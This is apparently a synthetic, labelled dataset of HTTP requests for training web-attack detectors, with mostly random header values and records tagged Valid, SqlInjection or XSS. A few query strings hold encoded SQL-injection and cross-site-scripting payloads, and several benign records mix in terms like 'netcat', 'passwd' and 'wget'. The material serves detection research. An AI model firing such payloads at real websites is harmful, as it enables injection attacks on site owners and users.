If-Range: "TCKtE8zFtJ5mq0G"
Max-Forwards: 2
MIME-Version: 4.9
Pragma: xenh='cee'
Proxy-Authorization: NTLM Y3R0ZGRTcmxiZW1iYWRhb0p0dHpuSHRvMDh2YXRmUXRVbw==
Authorization: Basic aG10YTplZ281Z2NhZQ==
Range: 715429-,64862-,731-870612
Referer: http://www.me9imo.org/cfoTyt/hecsb/AcBTvus.cgi
TE: trailers,deflate
Trailer: Host
User-Agent: ePhteg http://www.idLm8al.net
UA-CPU: PowerPC
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 179x3842
Via: 2.1 84.86.104.89, 4.1 www.ni6h4nrd.png
Transfer-Encoding: thd2he
Upgrade: ttlGsr/8.8, mshe/7.2
Warning: 659 214.21.203.106 "Esha" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 671477546416397721
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 3309
Start - Id: 26932
class: Valid
GET /evMfX6AZ/ofuI_SC3gWt/kg0/idL/7XerHppOQ/evalq.dll?EAoetowuZt2crr=meode+mt%5B+sj HTTP/1.1
Host: 72.127.23.106
Connection: close
Accept: video/mpeg, audio/*, text/*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, gzip, deflate, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 177.49.29.12
Cookie: sjAhhna5=01;w8eacy87ii=914930453;xDIYvat=ophp0$iamse ;oO4group byrw=54405;rheavrt=n/a;ged=a0oidtmxoH0
Cookie2: $Version="471"
Date: Wed, 26 Dec 07 16:43:36 GMT
ETag: "5kwEdB.HY4O_Yobzb"
Expect: 100-continue
From: hivetoa@epAldB8o.biz
If-Modified-Since: Wed, 10 Mar 04 04:16:50 UTC
If-Unmodified-Since: Sat, 07 Jul 07 02:15:07 GMT
If-Match: *
If-None-Match: "MJCBp.a0vmxFtN_"
If-Range: "cf26jYtL1MuzNKcKC7xk"
Max-Forwards: 28
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Lsqh neinrtc=qqEEf
Authorization: Ohpih ssemra0d=9aendjE
Range: 909287-,-7
Referer: /rRnz/Nm6dk/Dibn3e2/cnrla.cgi
TE: trailers
Trailer: If-Match
User-Agent: i0rXRw7Goh http://www.w3tlisse.de
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 863x0796
Via: 7.4 www.rre8ri.js:042, HTTP/8.7 www.24grZ.shtml
Transfer-Encoding: gzip
Upgrade: ectpgF/8.1, Hhdah/8.5, poai/0.7, eb2ee/2.4
Warning: 561 www.wyno.js "aaajeaa" "Mon, 25 May 09 20:49:12 UTC"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26932
Start - Id: 41888
class: SqlInjection
GET /etei/s_AoXg58O5.html?6rnotea3o=mi&bgsound-0TP=OR+%27ibeeb8evl%27++++IN++%28+++%27+++%27+++%29&Ad=8716&og1cIG952ksirai=167137&e8eeUeteq=227886&asfarrt=721 HTTP/1.1
Host: 29.144.82.65:80
Connection: sonsb
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: compress, identity;q=0.4, identity;q=0.4, deflate
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 143.204.36.23
Cookie: gnavser5=rR;GIUe=4951;ncti8zltb=t;Cerro8=sosTs7sx:jn7qro0a4
Cookie2: $Version="03"
Date: Fri, 04 May 07 08:50:53 GMT
ETag: "gPXWXCyV9O4k_0w1BPB"
Expect: tRes=eraidrt;9eka
From: elee@hieitj.de
If-Modified-Since: Fri, 27 Nov 09 22:45:25 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:56:49 UTC
If-Match: *
If-None-Match: "lYu5_imWY3_0OuBPHJ8X"
If-Range: *
Max-Forwards: 608
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: itfq bn7bnxr=jeUlmesd
Authorization: NTLM bXNlYnNwYWZvZXRhZnN6bmE1RW9IcmNEZGlvdG9sSGRhb2VpbXNoYWFFdG5zNzJ0
Range: 2764-93323,17883-91
Referer: /eeeAdedi/s1eug.fgf
TE: chunked;q=0.2,chunked,gzip
Trailer: Cache-Control
User-Agent: Mozilla/7.1 (Windows; U; WinNT 4.9; ou-ei; rv:4.9.3) Gecko/17592832
UA-CPU: PowerPC
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 044x365
Via: 6.4 www.mezydhs.css, HTTP/9.0 94.9.254.44
Transfer-Encoding: deflate
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41888
Start - Id: 26524
class: Valid
GET /eylahdoisittxst8/adtC/plhuiswc1npdyu/5rcpvPCGycj/uZnfrom_EcmdHVinsertdbE9u/uvNXR9k/rrDanurrmir/J9l8wmyIrW8mdpU/da9lbuio.js?ewfbabi5esacom=rmtsr9tytN&oiieioapdeai=7568&aan=910777&myheestiN=rbarie&9OLK@UQl=6249843&iInv2esp1el8=T7ewahtihaaepn&iBI@Ydy=9Q5AB.MCtGi&emt=wMMUu&ioheaVusEn=Ieey1aemrns&so6Ithp3xre=echoEsCe+vecanxterm&VYPLzFWd=lDqadmintzR&F5Uxem0tk8WN=%5Dutupdatea2hupdatesYs&vqss=ec%3F HTTP/1.0
Host: 174.246.242.173
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: ad-aat, t70Ba-t;q=0.4, ke4ee-h;q=0.7, at-namInn;q=0.6
Cache-Control: no-cache
Client-ip: 218.160.252.253
Cookie: a4tRbte=hga6
Cookie2: $Version="4"
Date: Fri, 24 Nov 06 08:06:48 UTC
ETag: W/"TDjd9j93BlwuvXd"
Expect: 100-continue
From: 7vteaPad@uansAaaste.de
If-Modified-Since: Sat, 09 Jan 10 24:56:00 CET
If-Unmodified-Since: Sat, 31 Oct 09 20:25:00 CET
If-Match: "1IAcsr97OijRQqQ."
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:04:41 CET
Max-Forwards: 1804
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic dTVvbjpoYW10N2lU
Authorization: toaFcd egxso=enxiwlt
Range: -51243,13953-
Referer: http://www.k6To.org/sSurd.cfm
TE: trailers
Trailer: TE
User-Agent: h7sutlrSi/0.9.2.0
UA-CPU: MIPS
UA-Disp: 196,1836,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: 4.0 175.9.56.237, A1boso/5.4 80.217.179.56, 7.2 41.78.55.192:7
Transfer-Encoding: gzip
Upgrade: ant/0.2, ebe/2.0
Warning: 503 www.rEangso.jpeg "tesd4si" "Wed, 14 May 08 12:40:15 GMT"
X-Forwarded-For: 36.115.237.41
X-Serial-Number: 693373977262
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26524
Start - Id: 9013
class: Valid
GET /sV5Ly@.Fv3/sBRMF2UkYXyC/h1z.GyHK3vpQSO/asraois/3zebrm8eaahsbetyte/qY%up0/rhoa9ttei5busir/UaLs6deleteMQL.aspx?N_OI=%2F%24aii&t2esp=httpfm3 HTTP/1.1
Host: www.oxrxehaai.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: macintosh;q=0.0, x-mac-chinesesimp, windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 34.121.25.179
Cookie: arf8qaa=mfed;uiieynn=ceNI4on3execDyopen;tuis=2753171413;oiemsl=9Z7a
Cookie2: $Version="34"
Date: Thu, 06 May 04 12:29:27 GMT
ETag: W/"Zd4TEEiadfEZVn1TSmFm"
Expect: rsna=taeheo4;iaiNrrni
From: 0c6Bwgm@lcfes.st
If-Modified-Since: Mon, 21 Sep 09 01:14:53 CET
If-Unmodified-Since: Sun, 22 Nov 09 12:50:47 UTC
If-Match: "AZjt1iYqN.ZgPAJNwHg"
If-None-Match: *
If-Range: Mon, 21 Aug 06 06:38:36 GMT
Max-Forwards: 296
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic dWV5dGRzOmR2dWFo
Authorization: bM7ar setw=tloe2s
Range: -751,66639-06
Referer: /amoed.html
TE: chunked;q=0.8,gzip
Trailer: From
User-Agent: Mozilla/5.6 (compatible; ufLAaCwl; Win98; 6lvt; hTrK1aos)
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7350x9086
Via: 1.3 www.aigdo.jpeg:331, 0.6 212.218.38.191:16215
Transfer-Encoding: compress
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9013
Start - Id: 19121
class: Valid
GET /ueyzjo1micaaeiRipi/eeu/fevtegrMOr/tAZ-uOOJNREr/hsle4etO/za57Hx/hIfFyN/cixbPBrRDJODCCn/uZ6WcpT1yp14PTX.png?eootadsuzhu=a.pVhg&iw6=a5%40CP&pil6ieylA0Tn=dfKKu4Q.&f2nl=MafoNoaiscseCoveia&OTBV=Hx33ytd&Gbn_mZSFRCT=dha HTTP/1.0
Host: www.ih1v.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: aTe-s;q=0.4, hD1a-rA0;q=0.5, 3Ne-idiaw;q=0.3, a3mhog-awfEru;q=0.9
Cache-Control: max-age=194
Client-ip: 250.159.224.244
Cookie: 4yvSsIntcn3ih=hto
Cookie2: $Version="48"
Date: Fri, 22 Aug 08 21:25:12 GMT
ETag: W/"HKkidc2U2-J99DY_@P"
Expect: nsaews7s=6orqot;nyaskn
From: eono6e9@e4noq.fr
If-Modified-Since: Sun, 27 Dec 09 03:41:40 GMT
If-Unmodified-Since: Sat, 03 Apr 04 23:52:51 GMT
If-Match: *
If-None-Match: "P3kbnNKeATeeSW2j83pY"
If-Range: Sun, 17 Jul 05 03:36:39 GMT
Max-Forwards: 9499
MIME-Version: 5.2
Pragma: oeHee=6nn
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: NTLM YmxsdHNjYXNzZmR0ZHJpYVRhcml0TnRycm9nYW5lYkVucWV3ZXU=
Range: 83457-7
Referer: http://ellma.st/t78ux/o7gnasec/a6rdw.pl
TE: chunked;q=0.9,gzip
Trailer: Warning
User-Agent: Mozilla/9.2 (compatible; oepkEjmmn; Open BSD i386; fgchb; t1rgiw4e; e9r8uwn)
UA-CPU: x86
UA-Disp: 531,060,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 315x9224
Via: 8.5 189.209.35.116, FTP/5.3 247.47.145.52
Transfer-Encoding: deflate
Upgrade: acA9M/5.5, taudh/0.0
Warning: 335 www.ekmeiB.jpg "0lne" "Wed, 30 May 07 03:16:49 UTC"
X-Forwarded-For: 168.136.167.141
X-Serial-Number: 2665334656610459
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19121
Start - Id: 47299
class: XSS
GET /nnutslcmspfcdrtu/Rlehqadnoytac/eK5-cuhZPYaezPSDbHwo/1ieouiMa/nsTC2XXtXMSe77k4r.shtml?sa9iierenla=87&ieseeo=%3Cdiv+++onmouseover++++%3D+++%22+%5Balert++%28%27is%27%29%3B%5D++%22%3E HTTP/1.1
Host: www.tatem.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: xe2i-o5eh4t, ishnole-1cm;q=0.5, jvc-j, ntks-aoae3rll, Egt-w6lmym;q=0.6
Cache-Control: no-transform
Client-ip: 62.213.205.8
Cookie: rh8nGa=rtefeeutm
Cookie2: $Version="1"
Date: Thu, 11 Dec 08 03:48:51 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: eeiu8=vi8oqoxb;sDze
From: etiosA@ol5yehtiwE.org
If-Modified-Since: Wed, 12 Dec 07 13:55:35 GMT
If-Unmodified-Since: Sun, 26 Jun 05 06:31:06 GMT
If-Match: "k1PfBSPcT4NXl0_Tw7"
If-None-Match: "dBzCBVvvijut.5H"
If-Range: "3n7ikzU_l9.nm5oQ"
Max-Forwards: 4
MIME-Version: 1.9
Pragma: lrs9et=yr0Ioh
Proxy-Authorization: Digest realm
Authorization: ntrmd im7i=TBdhmol
Range: -4,7256-5,39-5314
Referer: http://www.aiuinl.net/c6gL/saecs1lN/8mohdznv/btmhi/eNom2.tar.gz
TE: trailers,trailers,deflate;q=0.9
Trailer: From
User-Agent: Mozilla/0.1 (Machintosh; U; PPC 8.5; ee-0o; rv:7.9.9) Gecko/98975807
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/0.9 159.37.35.173
Transfer-Encoding: deflate
Upgrade: 8iiKe/2.0, iiEe/4.6, ywedbe/9.1, aapo/1.4, Pjtu/9.8
Warning: 299 www.leto.html "eaiemdnssbtcpoo5ntb" "Fri, 25 Aug 06 10:41:44 GMT"
X-Forwarded-For: 191.181.15.2
X-Serial-Number: 1360027
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47299
Start - Id: 17712
class: Valid
GET /0h7st/s13gadilXxxuasD/aBPily_uX/ey.html?noee8ddmwR=egte&dnhewgdxdoa5t=tbro&oa3=usrL7xhs&7dOauMfkhT=6ugOeoydsrj&ar=nezeeoqiepotaT1 HTTP/1.0
Host: 182.30.148.84
Connection: gFTgprE
Accept: audio/*;q=0.0, audio/*;q=0.7, text/xml
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: ofi1Et-frthazh, e7b-T
Cache-Control: max-age=422
Client-ip: 248.199.250.80
Cookie: bxoni5lk7=tn]u;twwemltneawei=empe
Cookie2: $Version="69"
Date: Wed, 25 Nov 09 21:30:27 UTC
ETag: "DyeckxjFKXR7NI4ApLSM"
Expect: nsea=3aSeeh;7utdaTs
From: Uucem@e0see0o8ai.uk
If-Modified-Since: Fri, 08 Jun 07 04:23:19 GMT
If-Unmodified-Since: Tue, 14 Jun 05 12:17:05 CET
If-Match: "k2RuiL.9ZjRqJbiKX_0"
If-None-Match: "aIqgq_Y.oaY7rqFXPpB_"
If-Range: *
Max-Forwards: 19
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: OeNlae neeb=ge58eile
Range: -024765,81164-91
Referer: http://areiaou.net/msTqsx2e/se2o/tWNs/bnnpgk5a/ieuetee.gif
TE: deflate,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.4 (Windows; U; Win98 7.1; tn-ne; rv:2.5.3) Gecko/09785154
UA-CPU: PowerPC
UA-Disp: 2302,8459,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 2.0 www.sTibza.shtml, tesnol/9.7 www.5tlNefa.shtml, FTP/3.8 www.emd5Eh.jpg
Transfer-Encoding: compress
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 767 69.128.160.133 "egbraecoboypesv" "Sat, 03 Sep 05 15:45:38 GMT"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 197606037
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17712
Start - Id: 7446
class: Valid
PUT /bu8h7e5oek/cJ.php3? HTTP/1.0
Content-Length: 248
Content-Language: foj,1enu,jnris5Td
Content-Encoding: gzip
Content-Location: /ezNpello/hNIe/ruelIee8/eehaor.mp3
Content-MD5: YXJhYm9uYXdha2h3b290bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Feb 10 02:55:29 UTC
Last-Modified: Tue, 06 Dec 05 10:34:40 CET
Host: www.meRIwm.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: 9eeadE='eo9na'
Client-ip: 88.207.186.172
Cookie: Lwsrnae=7tc );DVyhR=t;aOsailtc=nDBHO7PC4dZ;oiegpPyen=6452289;irzhia=hGRqSQp@p
Cookie2: $Version="11"
Date: Tue, 06 Jan 04 17:11:11 CET
ETag: W/"z3Y7L8L.q0H8jYFpAju"
Expect: 0e4ts=nt68c0
From: oyfadNse@f8Ndeoame.biz
If-Modified-Since: Mon, 23 Mar 09 07:06:06 UTC
If-Unmodified-Since: Sun, 27 Sep 09 07:30:45 GMT
If-Match: "HOc8rL8TTPgfRalGGnPd"
If-None-Match: "GxiVD-J6fne-Ayv"
If-Range: *
Max-Forwards: 477
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hLxu or4Sse=hvd2
Authorization: NTLM bnpIYWxmZXBuc08yUkRudGR0cm5sdzBvYm1zckprY21ldHR3aXVoTDBuaGVuY24=
Range: 43-
Referer: /1Teecms/rioha/rydo7Y.zip
TE: trailers,chunked;q=0.5
Trailer: Connection
User-Agent: Mozilla/4.1 (X11; U; Unix 6.7; 8r-ds; rv:6.0.1) Gecko/36487575
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7331x9166
Via: tydhs/4.4 www.tninG.jpg, 7.3 222.252.0.146:9, 2.4 226.119.28.122
Transfer-Encoding: gzip
Upgrade: aelor4/7.1
Warning: 340 20.61.112.232 "eyctI5hYr" "Wed, 31 Dec 08 22:53:52 GMT"
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 705782938216902909
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nTmseahtErl5hd=gicbandAx?ssd&09iaiarizstsly=L+&fixasy13=u iel$mandoNh r2echo0&Pmzj7dtsIOlw=enm\&7hLxgroup by7r9=8(l7a]imvNiRx&lydeewL2nr0a1=rotoS35on6tl&ruCyntkmdoalcs=36&soelrttdsI=+ee&Z1linkzHaccess_logP=6871175&duNemwat=eY7cPRek.BB

End - Id: 7446
Start - Id: 20984
class: Valid
GET /6nsnMy8xbgAnmtzu.msf? HTTP/1.0
Host: 164.145.167.180
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=48803
Client-ip: 169.27.197.117
Cookie: iKb9af=g9l;mqi6meod=eojs(t;oelbosohcJ=3ddv5Eslijfnr0is;rt9odlcTlDthnut=eogurtSnn y>pftn
Cookie2: $Version="073"
Date: Thu, 05 May 05 09:51:18 CET
ETag: "iILbNG7mW3KIhpYiHXR"
Expect: enii1Rn=icktpe
From: irgi@d2o4leorue.biz
If-Modified-Since: Wed, 24 Mar 10 07:35:58 UTC
If-Unmodified-Since: Thu, 01 Apr 04 04:11:02 GMT
If-Match: *
If-None-Match: "eMfdQIkdgL.Zf_4"
If-Range: *
Max-Forwards: 681
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZW9sVnRhdGU6Y05jeXllbg==
Authorization: Digest realm
Range: 8-7,-0713,855020-
Referer: /tnN6dad/uetaft/oott.asmx
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: Mozilla/4.2 (Machintosh; U; Mac OS X 0.5; ge-hj; rv:8.0.9) Gecko/71273417
UA-CPU: x86
UA-Disp: 9418,2909,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2687x271
Via: 1.1 www.2obmhmE.jpg
Transfer-Encoding: deflate
Upgrade: wrn/1.7, tal/7.3, xhsnbh/3.1, taut/3.1
Warning: 944 www.gottr.shtml "wsoRtadsxtnNaanhe" 
X-Forwarded-For: 124.152.206.172
X-Serial-Number: 40381242667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20984
Start - Id: 21081
class: Valid
GET /ihleNghncuep1ochehOp/npgR/aWYN9hK@b9pQWfcfxw/w2/dILZGmUYC/zDbFftp0Gnetcat/gmcXspasswdolibfV/oTrp9VxdQMMyjIhJMLvq/ersoGrl/BTl/eimhOocih.swf?hpwao4rU=2wdhd0down&8ir=aM.SQeq HTTP/1.1
Host: 126.197.94.169:80
Connection: close
Accept: application/postscript, audio/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.3, identity
Accept-Language: qo1reyea-haettd;q=0.3, ihej-o, fmktl9l-8u7, t-fle0e0e, ns6-rotrmmr;q=0.0
Cache-Control: only-if-cached
Client-ip: 32.242.224.45
Cookie: a.bXXaK=eiIkSvwLdejY;oe=9561
Cookie2: $Version="968"
Date: Fri, 06 Jan 06 16:33:28 UTC
ETag: W/"6vR35mcl.mWQF5M4Y-i"
Expect: tNlt=exeet
From: TcuGd@oto9w.com
If-Modified-Since: Wed, 18 Jan 06 02:49:17 UTC
If-Unmodified-Since: Fri, 23 May 08 02:07:22 GMT
If-Match: *
If-None-Match: "Ws7LIrGL-_gYlPA"
If-Range: Thu, 21 Jul 05 09:07:42 UTC
Max-Forwards: 727
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic VHp5czpjNE50bGF3ZA==
Authorization: Basic Z3FyOTp0b2J0b2F0SQ==
Range: 966923-49277,-9,672714-
Referer: http://ioce.fr/etUct8t/eogywexe/twqeg/tsijtga.fgf
TE: trailers
Trailer: TE
User-Agent: rhoscmn/8.7.9.1
UA-CPU: 68000
UA-Disp: 708,2630,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 523x776
Via: tkte/0.7 www.xOlotg.htm
Transfer-Encoding: gzip
Upgrade: 7ynff/7.0
Warning: 189 www.hycml3zs.png "rldecgpldeu7l" 
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 375530664718592378
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 21081
Start - Id: 18145
class: Valid
GET /toC./dbvO/ph0ass/rwrso2bMz43e76/eAZlwxI5qMQit1aJ8d6/e.ca@jab/ses8neuswtnbseoea/S9Pw2XGWbf.js?agmheast=232&nWGVNWetc=e17o&ahb=u&seTxrSnahHwiLe=UtetnA0yii&saNnelvfuuy5i=i_3L0dsxl&njp=9924902560&dJ@9wwprocessing-instructionH.g5Q=gNDQ&im2hugl8si=97&Dcs=rus%40nhb&cd=o703-vRtb HTTP/1.1
Host: 230.66.95.85:80
Connection: keep-alive
Accept: image/png;q=0.4, application/rtf
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: 7ajdsdbb-n, aAnl0e-p6;q=0.0
Cache-Control: max-age=9291
Client-ip: 165.189.39.9
Cookie: 5neuee=&h
Cookie2: $Version="69"
Date: Wed, 25 Apr 07 17:29:24 GMT
ETag: W/"8gDiVI4878MrhqFEe"
Expect: i0e3c=tmaTard;aean
From: espenT@te4e.biz
If-Modified-Since: Thu, 05 May 05 03:12:21 CET
If-Unmodified-Since: Fri, 26 Aug 05 10:07:25 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jan 04 01:55:28 CET
Max-Forwards: 2484
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/nPebcg/ehdrnsq/omagny/yoasqtnO.shtml
Authorization: 542k 9fhocl=b2t4rce
Range: -69064,75-37,650952-
Referer: http://www.ebsa.org/prtrmut/s1as.cgi
TE: trailers,deflate,trailers
Trailer: From
User-Agent: Mozilla/7.8 (X11; U; Open BSD i386 7.1; ee-df; rv:3.6.5) Gecko/36277203
UA-CPU: PowerPC
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3922x0648
Via: yjR/3.1 134.147.180.69, trtt/6.1 5.188.219.60, FTP/2.6 48.201.216.18:72668
Transfer-Encoding: compress
Upgrade: ntruhi/4.8, rmIedy/9.6, Jdofri/4.6, dst/8.7, ntf/7.6
Warning: 209 www.se8n4i2.jpeg:54 "geLngmEscrtdtorher" "Sat, 15 Sep 07 18:14:44 UTC"
X-Forwarded-For: 47.138.63.112
X-Serial-Number: 21129432693089718
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18145
Start - Id: 6301
class: Valid
PUT /KdevalB/tAomloancHh1t1utnt/uoEhtnUmhcBsersmiB/43AlRNEl/ivrd/2ndrtsti/e36q@Q6Bd/asqJd81h/L3pIo0aylnd/jXecho4FaP0F.dll? HTTP/1.0
Content-Length: 79
Content-Language: wwz6
Content-Encoding: deflate
Content-Location: /cs8iez/icmhz.pl
Content-MD5: ZWV5c25rYXR0bjhPZmw5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 Aug 09 16:21:23 UTC
Last-Modified: Fri, 20 Feb 09 18:54:43 CET
Host: 125.201.193.178:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 99.32.69.228
Cookie: rmaO=69446940;sTCt4tXa=1353708
Cookie2: $Version="2"
Date: Tue, 28 Oct 08 24:35:11 CET
ETag: W/"CRrlvqSg_oS8jZDr"
Expect: Eyilas=df2aoe
From: eOapi@ngtn7he.gov
If-Modified-Since: Tue, 08 Feb 05 24:14:51 GMT
If-Unmodified-Since: Wed, 14 Apr 04 13:48:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Feb 10 02:01:15 GMT
Max-Forwards: 2
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: ut4s fpas=rrsds
Range: -7,85-,-56498
Referer: http://zehdbm5e.fr/rceoo7/Erennmt/72tKcl.gif
TE: trailers
Trailer: From
User-Agent: mdsqolxch/8.7.6
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 475x5862
Via: 0.2 185.127.218.184
Transfer-Encoding: identity
Upgrade: 7nda/8.0
Warning: 155 www.3r0o.gif "onb5edtw" "Tue, 10 Oct 06 03:14:15 UTC"
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zawexiAsa=6793&vuzfMtma=39394&0ddivlUwgetnn8=dZSpg&i2uhNe1yt1eitk=pLuo&kE=9M4Bi

End - Id: 6301
Start - Id: 2064
class: Valid
GET /sf/sfy4Coi@OcYP0aUDX/tzGBKlE2-zM/u1bF7tOXOM/sASeiHtdtincozt7a/liniouwsoM03tavet41m.msf?ry=718&uh1t=pd3hX%40sk&Reer=49586&tlvseasthi=AehoDnTl9y&reFrZAdtooiama=8831&rnAmbm5mynydsns=120256&ipu=5wYkied&s8hIrpcidhm=eStsstcs9hwinntju&3L1N=e7n HTTP/1.0
Host: 147.218.255.134:81
Connection: nhgci2lt
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.6, deflate;q=0.7, deflate;q=0.2, compress;q=0.3, deflate;q=0.1
Accept-Language: *;q=0.0
Cache-Control: max-stale=46
Client-ip: 160.70.47.198
Cookie: QBaZlink=1457805908;mow=Fo;prsnohSasl=usr706irihrlsor;uo7ee5eiA=lehsaibnre;;ePArasdUfLhmcs=nphp;fnipoi01ioMueie=gFoIQBKz
Cookie2: $Version="2"
Date: Tue, 29 Apr 08 20:09:10 GMT
ETag: "CqKJhzj3js0ETbABe"
Expect: lprt=6hOebism;raxsl
From: wDshh4eU@hl5stetee.com
If-Modified-Since: Fri, 28 Mar 08 14:15:11 GMT
If-Unmodified-Since: Sat, 10 Jul 04 19:07:34 UTC
If-Match: "eLOhbSt9teIsT7m@BcL"
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 1.2
Pragma: tmrcncsw=eUo0
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: Basic dHd0ZXJhOmVsdVV0cGY=
Range: -586766,7072-,732551-
Referer: /y2nsdn/wR4eEdya/lwte/eeis.conf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: azOTAS5X7 http://www.sanf.biz
UA-CPU: StrongARM
UA-Disp: 0185,510,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 008x3318
Via: 0.5 www.bmrav8e.html, 2.4 57.15.211.108:257, 9.6 www.nnnaknhS.jpeg
Transfer-Encoding: compress
Upgrade: wleh/1.8
Warning: 344 www.BJasytN.css "r0la5" 
X-Forwarded-For: 242.10.119.24
X-Serial-Number: 82872435333808
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2064
Start - Id: 34165
class: Valid
PUT /tOR3/npaCo/sErgIepw9dnorsya/sQW/ori59n8DLspmastu/tCBWlTMERDOm3r8/rcChuXz/mHOeUuCBg.asp? HTTP/1.1
Content-Length: 296
Content-Language: daar,irr
Content-Encoding: gzip
Content-Location: http://www.eesE.net/lo8o/ryna/ensfc/12nrbn/mtwrs3ns.jpg
Content-MD5: TW5hM2NoT3NocHVucmRlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
